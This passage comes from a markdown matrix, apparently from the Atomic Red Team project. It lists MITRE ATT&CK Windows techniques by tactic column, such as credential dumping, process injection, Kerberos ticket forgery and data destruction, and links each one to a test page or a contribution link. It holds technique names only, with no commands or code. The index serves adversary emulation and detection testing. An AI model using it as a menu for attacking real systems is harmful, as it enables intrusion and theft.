Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Information Discovery](../../T1082/T1082.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Video Capture](../../T1125/T1125.md) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Inter-Process Communication](../../T1559/T1559.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Process Injection](../../T1055/T1055.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Password Policy Discovery](../../T1201/T1201.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Query Registry](../../T1012/T1012.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Encrypted Channel](../../T1573/T1573.md) | |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Software Discovery](../../T1518/T1518.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Indirect Command Execution](../../T1202/T1202.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Masquerading](../../T1036/T1036.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | [Time Providers](../../T1547.003/T1547.003.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Process Injection](../../T1055/T1055.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Forced Authentication](../../T1187/T1187.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
